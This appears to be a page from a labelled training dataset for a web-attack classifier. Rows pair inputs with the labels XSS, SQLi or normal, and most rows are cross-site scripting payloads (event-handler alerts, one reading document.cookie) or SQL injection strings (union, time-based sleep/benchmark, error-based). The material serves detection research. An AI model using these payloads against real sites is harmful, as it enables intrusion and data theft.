stringlengths 1
| Label
int64 1
| text_label
stringclasses 3
values | ID
int64 3
<b oncopy="alert(1)" contenteditable>test</b> | 1 | XSS | 6,736 |
1' ) as wnys where 6457 = 6457 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) # | 2 | SQLi | 15,041 |
Let's choose a location for our gathering. | 3 | normal | 23,971 |
<thead onbeforecut="alert(1)" contenteditable>test</thead> | 1 | XSS | 3,894 |
<tfoot onfocusout=alert(1) tabindex=1 id=x></tfoot><input autofocus> | 1 | XSS | 2,615 |
( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( "%" = " | 2 | SQLi | 16,866 |
<u onmousemove="alert(1)">test</u> | 1 | XSS | 9,241 |
<hr oncopy="alert(1)" contenteditable>test</hr> | 1 | XSS | 6,178 |
1" where 7788 = 7788 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) -- | 2 | SQLi | 11,542 |
Select your desire. | 3 | normal | 24,939 |
Select a song to play. | 3 | normal | 24,162 |
-1985 ) ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ( 1248 = 1248 | 2 | SQLi | 9,977 |
<footer onpointerenter=alert(1)>XSS</footer> | 1 | XSS | 6,938 |
1%' ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( '%' = ' | 2 | SQLi | 12,162 |
<video autoplay controls onwaiting=alert(1)><source src="validvideo.mp4" type=video/mp4></video> | 1 | XSS | 1,577 |
1%" ) and 8514 = ( select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 ) and ( "%" = " | 2 | SQLi | 13,150 |
<frame onmouseup="alert(1)">test</frame> | 1 | XSS | 7,991 |
Search records where relevant. | 3 | normal | 23,261 |
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out | 1 | XSS | 1,585 |
1' ) and make_set ( 6488 = 5525,5525 ) | 2 | SQLi | 19,788 |
<style>@keyframes x{}</style><footer style="animation-name:x" onanimationend="alert(1)"></footer> | 1 | XSS | 1,522 |
{"id":null,"name":"Venipede"} | 3 | normal | 27,300 |
<style>@keyframes x{}</style><style style="animation-name:x" onanimationend="alert(1)"></style> | 1 | XSS | 1,619 |
1" union all select null,null# | 2 | SQLi | 20,649 |
1%' ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( '%' = ' | 2 | SQLi | 12,145 |
-1617%" or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and "%" = " | 2 | SQLi | 10,788 |
{"id":null,"firstName":"Chai","lastName":"Kon Moi","address":"305 W 45th St, New York NY 10036","city":"957","telephone":"4065619129"} | 3 | normal | 26,750 |
1%' ) ) ) and elt ( 7425 = 3843,3843 ) and ( ( ( '%' = ' | 2 | SQLi | 17,633 |
<img src =q onerror=prompt(8)> | 1 | XSS | 9,525 |
1" ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( "rfpq" = "rfpq | 2 | SQLi | 12,628 |
Select your reflect. | 3 | normal | 24,978 |
1" ) ) as wwqj where 3249 = 3249 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) -- | 2 | SQLi | 12,049 |
SRC=# onmouseover="alert(document.cookie) | 1 | XSS | 7,624 |
-8963 ) where 8528 = 8528 or ( 2470 = 3271 ) *3271-- | 2 | SQLi | 18,168 |
`'><script>\xE2\x80\x8Ajavascript:alert(513)</script> | 1 | XSS | 5,060 |
{"id":null,"firstName":"Tony Quek","lastName":"Quek","address":"115 N WEBB RD, GRAND ISLAND NE 68803","city":"229","telephone":"4614015193"} | 3 | normal | 27,352 |
1'|| ( select 'vixv' from dual where 7704 = 7704 union all select null,null,null,null,null-- | 2 | SQLi | 14,588 |
Select buy. | 3 | normal | 24,562 |
1%' ) ) ) union all select null,null,null,null# | 2 | SQLi | 18,820 |
<time id=x tabindex=1 ondeactivate=alert(1)></time><input id=y autofocus> | 1 | XSS | 2,320 |
<x%09onxxx=1 | 1 | XSS | 9,832 |
<style>@keyframes slidein {}</style><slot style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></slot> | 1 | XSS | 407 |
<script>$("").click(function() {alert('foo');$("").click();});$("").click(function() {alert('bar');location="";});</script>//["'`-->]]>]</div> | 1 | XSS | 221 |
<audio onkeypress="alert(1)" contenteditable>test</audio> | 1 | XSS | 4,125 |
Select first. | 3 | normal | 24,489 |
1 ) or 9643 = ( select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 ) | 2 | SQLi | 13,962 |
Join hike. | 3 | normal | 23,048 |
echo('IPT>alert("XSS")</SCRIPT>'); ?> | 1 | XSS | 8,759 |
<bgsound id=x tabindex=1 ondeactivate=alert(1)></bgsound><input id=y autofocus> | 1 | XSS | 2,039 |
<html onmouseover="alert(1)">test</html> | 1 | XSS | 7,950 |
<style>:target {color:red;}</style><spacer id=x style="transition:color 1s" ontransitionend=alert(1)></spacer> | 1 | XSS | 1,024 |
<source onmouseup="alert(1)">test</source> | 1 | XSS | 7,437 |
1' and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) | 2 | SQLi | 10,909 |
1" ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( "yrgy" like "yrgy | 2 | SQLi | 13,758 |
<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><big id=x style="position:absolute;" onanimationcancel="alert(1)"></big> | 1 | XSS | 268 |
1' ) ) and sleep ( 5 ) and ( ( 'tcwt' = 'tcwt | 2 | SQLi | 19,036 |
<nobr onclick="alert(1)">test</nobr> | 1 | XSS | 8,864 |
<noembed onkeyup="alert(1)" contenteditable>test</noembed> | 1 | XSS | 3,829 |
Select a game for family game night. | 3 | normal | 24,201 |
1" or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and "bkrk" = "bkrk | 2 | SQLi | 11,037 |
Where's the mindfulness workshop? | 3 | normal | 23,661 |
<style>@keyframes x{}</style><datalist style="animation-name:x" onanimationstart="alert(1)"></datalist> | 1 | XSS | 1,353 |
select * from users where id = 1 or ".]" or 1 = 1 -- 1 | 2 | SQLi | 17,867 |
Select a book for your reading pleasure. | 3 | normal | 24,010 |
1 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) -- fzhj | 2 | SQLi | 10,958 |
select * from users where id = 1 +\. union select null,@@VERSION -- 1 | 2 | SQLi | 16,264 |
<![CDATA[<script>var n=0;while(true){n++;}</script>]]> | 1 | XSS | 4,667 |
<style>:target {color: red;}</style><i id=x style="transition:color 10s" ontransitioncancel=alert(1)></i> | 1 | XSS | 1,265 |
-2384%' ) ) union all select 2467,2467,2467,2467# | 2 | SQLi | 18,596 |
<element onkeydown="alert(1)" contenteditable>test</element> | 1 | XSS | 3,586 |
<ins onkeyup="alert(1)" contenteditable>test</ins> | 1 | XSS | 5,526 |
<nav oncontextmenu="alert(1)">test</nav> | 1 | XSS | 7,916 |
<select onpointerout=alert(1)>XSS</select> | 1 | XSS | 7,475 |
<data onkeydown="alert(1)" contenteditable>test</data> | 1 | XSS | 4,725 |
create or replace function sleep ( int ) returns int as '/lib/','sleep' language 'c' strict | 2 | SQLi | 14,151 |
union (select @@version) -- | 2 | SQLi | 20,850 |
1 ) ) ) order by 1-- | 2 | SQLi | 21,866 |
<center oncut="alert(1)" contenteditable>test</center> | 1 | XSS | 4,764 |
<hr onbeforecopy="alert(1)" contenteditable>test</hr> | 1 | XSS | 4,970 |
Congratulations to our own @ JulienMid and @ Value247 who have been selected on Team @ Yassuo for the upcoming League of Legends Twitch Rivals!... Will Value secure the three-peat? Will Julien win his first championship? Find out next week!.. | 3 | normal | 26,513 |
1' or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) # | 2 | SQLi | 17,493 |
-2864' ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 'vjbl' = 'vjbl | 2 | SQLi | 10,204 |
1 ) ) rlike ( select ( case when ( 6113 = 1222 ) then 1 else 0x28 end ) ) and ( ( 2815 = 2815 | 2 | SQLi | 14,487 |
1' ) where 8948 = 8948 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) -- | 2 | SQLi | 14,455 |
Select the right shade of lipstick. | 3 | normal | 24,097 |
1 ) where 5550 = 5550 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) -- | 2 | SQLi | 10,869 |
<header onbeforecut="alert(1)" contenteditable>test</header> | 1 | XSS | 3,519 |
<style>@keyframes slidein {}</style><cite style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></cite> | 1 | XSS | 397 |
<li onblur=alert(1) tabindex=1 id=x></li><input autofocus> | 1 | XSS | 3,835 |
Delete the email. | 3 | normal | 22,873 |
To unfreeze the frames, select "View," then select "Unfreeze Panes." | 3 | normal | 25,258 |
<kbd onbeforecut="alert(1)" contenteditable>test</kbd> | 1 | XSS | 4,710 |
1 or sleep ( 5 ) # | 2 | SQLi | 22,064 |
<center draggable="true" ondragenter="alert(1)">test</center> | 1 | XSS | 3,309 |
<command onpointerleave=alert(1)>XSS</command> | 1 | XSS | 6,293 |
1" ) rlike sleep ( 5 ) # | 2 | SQLi | 21,234 |
<table id=x tabindex=1 onactivate=alert(1)></table> | 1 | XSS | 5,442 |
<dl onpointerout=alert(1)>XSS</dl> | 1 | XSS | 9,263 |
In a primary, voters select one candidate on a ballot. | 3 | normal | 26,020 |
1" ) ) as whyr where 9731 = 9731 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) -- | 2 | SQLi | 14,641 |